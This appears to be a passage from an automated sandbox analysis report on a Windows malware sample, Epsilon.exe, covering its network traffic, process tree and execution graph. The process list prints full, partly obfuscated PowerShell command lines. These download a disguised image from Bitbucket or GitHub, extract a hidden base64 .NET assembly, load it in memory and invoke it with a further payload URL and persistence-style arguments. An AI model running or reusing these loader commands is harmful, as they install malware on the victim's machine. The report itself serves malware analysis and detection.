                                                                              Dec 31, 2024 00:46:06.965795040 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.973500013 CET49705443192.168.2.5185.166.143.48
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 31, 2024 00:45:57.323589087 CET  53813        53         192.168.2.5  1.1.1.1
Dec 31, 2024 00:45:57.330703020 CET  53           53813      1.1.1.1      192.168.2.5
Dec 31, 2024 00:46:05.820818901 CET  62149        53         192.168.2.5  1.1.1.1
Dec 31, 2024 00:46:05.827577114 CET  53           62149      1.1.1.1      192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Dec 31, 2024 00:45:57.323589087 CET  192.168.2.5  1.1.1.1  0xcadd    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Dec 31, 2024 00:46:05.820818901 CET  192.168.2.5  1.1.1.1  0xf422    Standard query (0)  bitbucket.org              A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
Dec 31, 2024 00:45:57.330703020 CET  1.1.1.1    192.168.2.5  0xcadd    No error (0)  raw.githubusercontent.com  -      185.199.111.133  A (IP address)  IN (0x0001)  false
Dec 31, 2024 00:45:57.330703020 CET  1.1.1.1    192.168.2.5  0xcadd    No error (0)  raw.githubusercontent.com  -      185.199.110.133  A (IP address)  IN (0x0001)  false
Dec 31, 2024 00:45:57.330703020 CET  1.1.1.1    192.168.2.5  0xcadd    No error (0)  raw.githubusercontent.com  -      185.199.109.133  A (IP address)  IN (0x0001)  false
Dec 31, 2024 00:45:57.330703020 CET  1.1.1.1    192.168.2.5  0xcadd    No error (0)  raw.githubusercontent.com  -      185.199.108.133  A (IP address)  IN (0x0001)  false
Dec 31, 2024 00:46:05.827577114 CET  1.1.1.1    192.168.2.5  0xf422    No error (0)  bitbucket.org              -      185.166.143.48   A (IP address)  IN (0x0001)  false
Dec 31, 2024 00:46:05.827577114 CET  1.1.1.1    192.168.2.5  0xf422    No error (0)  bitbucket.org              -      185.166.143.49   A (IP address)  IN (0x0001)  false
Dec 31, 2024 00:46:05.827577114 CET  1.1.1.1    192.168.2.5  0xf422    No error (0)  bitbucket.org              -      185.166.143.50   A (IP address)  IN (0x0001)  false
• raw.githubusercontent.com
• bitbucket.org
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.5  49704        185.199.111.133  443               7660  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 23:45:57 UTC  121                OUT        GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-12-30 23:45:57 UTC  888                IN         HTTP/1.1 200 OK
Connection: close
Content-Length: 4697658
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: image/jpeg
ETag: "b899cc7aa3319a16e239ba6cb263113b100d6fa7ed0190f683f329a66758220c"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 7C3A:31FFFC:3FA070:47A6BC:677330B5
Accept-Ranges: bytes
Date: Mon, 30 Dec 2024 23:45:57 GMT
Via: 1.1 varnish
X-Served-By: cache-ewr-kewr1740049-EWR
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1735602358.878375,VS0,VE37
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9783a586f2445cb5c594579c7eef0c5a7f3c0a1a
Expires: Mon, 30 Dec 2024 23:50:57 GMT
Source-Age: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49705        185.166.143.48  443               7660  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 23:46:06 UTC  104                OUT        GET /rterterq/fwqfqweqwr/downloads/opkSkch.txt HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2024-12-30 23:46:06 UTC  4799               IN         HTTP/1.1 404 Not Found
Date: Mon, 30 Dec 2024 23:46:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15006
Server: AtlassianEdge
Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
X-Used-Mesh: False
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
Etag: "1c2c848b4429d52ca3adbc7af471337d"
X-Dc-Location: Micros-3
X-Served-By: b21088039ab2
X-Version: c9b3998323c0
X-Static-Version: c9b3998323c0
X-Request-Count: 4163
X-Render-Time: 0.07419872283935547
X-B3-Traceid: 9cad47e97f70404b945b4d3a04e1fe2d
X-B3-Spanid: ac1738aebb95f397
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassi [TRUNCATED]
X-Usage-Quota-Remaining: 998716.986
X-Usage-Request-Cost: 1304.27
X-Usage-User-Time: 0.039128
X-Usage-System-Time: 0.000000
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Cache-Control: max-age=900
Age: 358
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 1de4c2ad7d7f405e98062be16fecf6b4
Atl-Request-Id: 1de4c2ad-7d7f-405e-9806-2be16fecf6b4
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=4,atl-edge-upstream;dur=91,atl-edge-pop;desc="aws-eu-central-1"
Connection: close


Target ID: 0
Start time: 18:45:52
Start date: 30/12/2024
Path: C:\Users\user\Desktop\Epsilon.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Epsilon.exe"
Imagebase: 0x7ff737820000
File size: 163'840 bytes
MD5 hash: 61566AA90D2DCAF483FE4697031F46C4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                              Target ID:1
                                                                              Start time:18:45:52
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:cmd.exe /c 677174b841ee7.vbs
                                                                              Imagebase:0x7ff6abe90000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:18:45:52
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:18:45:52
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs"
                                                                              Imagebase:0x7ff66d2d0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:18:45:53
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C
$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G
0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBo$GM$awBT$Gs$c$Bv$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBy$Hc$cQBl$Hc$cQBm$HE$dwBm$C8$cQBy$GU$d$By$GU$d$By$C8$ZwBy$G8$LgB0$GU$awBj$HU$YgB0$Gk$Yg$n$Cw$I$$n$D$$Jw$s$C$$JwBT$HQ$YQBy$HQ$dQBw$E4$YQBt$GU$Jw$s$C$$JwBN$HM$YgB1$Gk$b$Bk$Cc$L$$g$Cc$M$$n$Ck$KQB9$H0$';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:18:45:53
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:18:45:55
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:31.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:40.6%
                                                                                Total number of Nodes:930
                                                                                Total number of Limit Nodes:48
                                                                                execution_graph 2066 7ff7378258b0 2067 7ff7378258ee 2066->2067 2068 7ff737825904 2066->2068 2069 7ff7378258fc 2067->2069 2070 7ff737825770 CloseHandle 2067->2070 2068->2069 2072 7ff737825a29 2068->2072 2075 7ff73782591a 2068->2075 2122 7ff737828470 2069->2122 2070->2069 2074 7ff737825a35 SetWindowTextA 2072->2074 2076 7ff737825a4a 2072->2076 2074->2076 2075->2069 2078 7ff737825982 DosDateTimeToFileTime 2075->2078 2076->2069 2094 7ff7378251bc GetFileAttributesA 2076->2094 2078->2069 2080 7ff7378259a3 LocalFileTimeToFileTime 2078->2080 2080->2069 2081 7ff7378259c1 SetFileTime 2080->2081 2081->2069 2082 7ff7378259e9 2081->2082 2091 7ff737825770 2082->2091 2087 7ff737825ac1 2113 7ff73782527c LocalAlloc 2087->2113 2090 7ff737825acb 2090->2069 2092 7ff73782578f SetFileAttributesA 2091->2092 2093 7ff7378257a4 CloseHandle 2091->2093 2092->2069 2093->2092 2095 7ff73782525f 2094->2095 2096 7ff7378251de 2094->2096 2095->2069 2101 7ff737825380 2095->2101 2096->2095 2097 7ff737825246 SetFileAttributesA 2096->2097 2130 7ff737827ac8 FindResourceA 2096->2130 2097->2095 2100 7ff73782523c 2100->2097 2102 7ff7378253b3 2101->2102 2103 7ff7378253fd lstrcmpA 2102->2103 2104 7ff7378253d0 2102->2104 2106 7ff7378253f4 2103->2106 2107 7ff737825454 2103->2107 2105 7ff737824dcc 24 API calls 2104->2105 2105->2106 2106->2069 2106->2087 2107->2106 2108 7ff7378254a8 CreateFileA 2107->2108 2108->2106 2110 7ff7378254de 2108->2110 2109 7ff737825561 CreateFileA 2109->2106 2110->2106 2110->2109 2111 7ff737825549 CharNextA 2110->2111 2112 7ff737825532 CreateDirectoryA 2110->2112 2111->2110 2112->2111 2114 7ff7378252aa 2113->2114 2116 7ff7378252d4 2113->2116 2115 7ff737824dcc 24 API calls 2114->2115 2117 7ff7378252cd 2115->2117 2116->2116 2118 7ff7378252e4 LocalAlloc 2116->2118 2117->2090 2118->2117 2119 7ff737825300 2118->2119 2120 7ff737824dcc 24 API calls 2119->2120 2121 7ff737825323 LocalFree 2120->2121 2121->2117 2123 
7ff737828479 2122->2123 2124 7ff737825af4 2123->2124 2125 7ff7378284d0 RtlCaptureContext RtlLookupFunctionEntry 2123->2125 2126 7ff737828557 2125->2126 2127 7ff737828515 RtlVirtualUnwind 2125->2127 2185 7ff737828494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2126->2185 2127->2126 2131 7ff737827b63 2130->2131 2132 7ff737827b03 LoadResource 2130->2132 2138 7ff737824dcc 2131->2138 2132->2131 2133 7ff737827b1d DialogBoxIndirectParamA FreeResource 2132->2133 2133->2131 2136 7ff737825228 2133->2136 2136->2095 2136->2097 2136->2100 2139 7ff737824e49 LoadStringA 2138->2139 2153 7ff737825024 2138->2153 2141 7ff737824e73 2139->2141 2142 7ff737824eb5 2139->2142 2140 7ff737828470 7 API calls 2143 7ff737825035 2140->2143 2167 7ff737827f04 2141->2167 2146 7ff737824f31 2142->2146 2147 7ff737824ec1 2142->2147 2143->2136 2146->2146 2150 7ff737824f8e LocalAlloc 2146->2150 2151 7ff737824f44 LocalAlloc 2146->2151 2147->2147 2154 7ff737824eeb LocalAlloc 2147->2154 2148 7ff737824e81 MessageBoxA 2148->2153 2150->2153 2162 7ff737824f2c 2150->2162 2151->2153 2156 7ff737824f79 2151->2156 2153->2140 2154->2153 2158 7ff737824f14 2154->2158 2159 7ff73782114c _vsnprintf 2156->2159 2157 7ff737824fbc MessageBeep 2160 7ff737827f04 13 API calls 2157->2160 2182 7ff73782114c 2158->2182 2159->2162 2163 7ff737824fd3 2160->2163 2162->2157 2164 7ff737824fdc MessageBoxA LocalFree 2163->2164 2165 7ff737827e34 2 API calls 2163->2165 2164->2153 2165->2164 2168 7ff737827f44 GetVersionExA 2167->2168 2177 7ff737828076 2167->2177 2169 7ff737827f6d 2168->2169 2168->2177 2172 7ff737827f90 GetSystemMetrics 2169->2172 2169->2177 2170 7ff737828470 7 API calls 2171 7ff737824e78 2170->2171 2171->2148 2178 7ff737827e34 2171->2178 2173 7ff737827fa7 RegOpenKeyExA 2172->2173 2172->2177 2174 7ff737827fdc RegQueryValueExA RegCloseKey 2173->2174 2173->2177 2176 7ff737828026 2174->2176 2174->2177 2175 7ff737828065 CharNextA 2175->2176 2176->2175 2176->2177 2177->2170 2179 
7ff737827e5a EnumResourceLanguagesA 2178->2179 2180 7ff737827edd 2178->2180 2179->2180 2181 7ff737827e9f EnumResourceLanguagesA 2179->2181 2180->2148 2181->2180 2183 7ff737821178 _vsnprintf 2182->2183 2184 7ff737821199 2182->2184 2183->2184 2184->2162 2186 7ff737823910 2187 7ff737823933 2186->2187 2188 7ff737823a09 2186->2188 2187->2188 2190 7ff737823948 2187->2190 2191 7ff737823a11 GetDesktopWindow 2187->2191 2189 7ff737823b1a EndDialog 2188->2189 2194 7ff737823954 2188->2194 2189->2194 2192 7ff73782394c 2190->2192 2193 7ff73782397b 2190->2193 2209 7ff737824c68 6 API calls 2191->2209 2192->2194 2196 7ff73782395b TerminateThread 2192->2196 2193->2194 2197 7ff737823985 ResetEvent 2193->2197 2196->2189 2199 7ff737824dcc 24 API calls 2197->2199 2203 7ff7378239c3 2199->2203 2200 7ff737823a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2201 7ff737823a9b SetWindowTextA CreateThread 2200->2201 2201->2194 2202 7ff737823ae8 2201->2202 2204 7ff737824dcc 24 API calls 2202->2204 2205 7ff7378239e4 SetEvent 2203->2205 2207 7ff7378239cc SetEvent 2203->2207 2206 7ff737823b07 2204->2206 2214 7ff737823b40 2205->2214 2206->2188 2207->2194 2211 7ff737824d3f SetWindowPos 2209->2211 2212 7ff737828470 7 API calls 2211->2212 2213 7ff737823a2f 2212->2213 2213->2200 2213->2201 2215 7ff737823b4c MsgWaitForMultipleObjects 2214->2215 2216 7ff737823b74 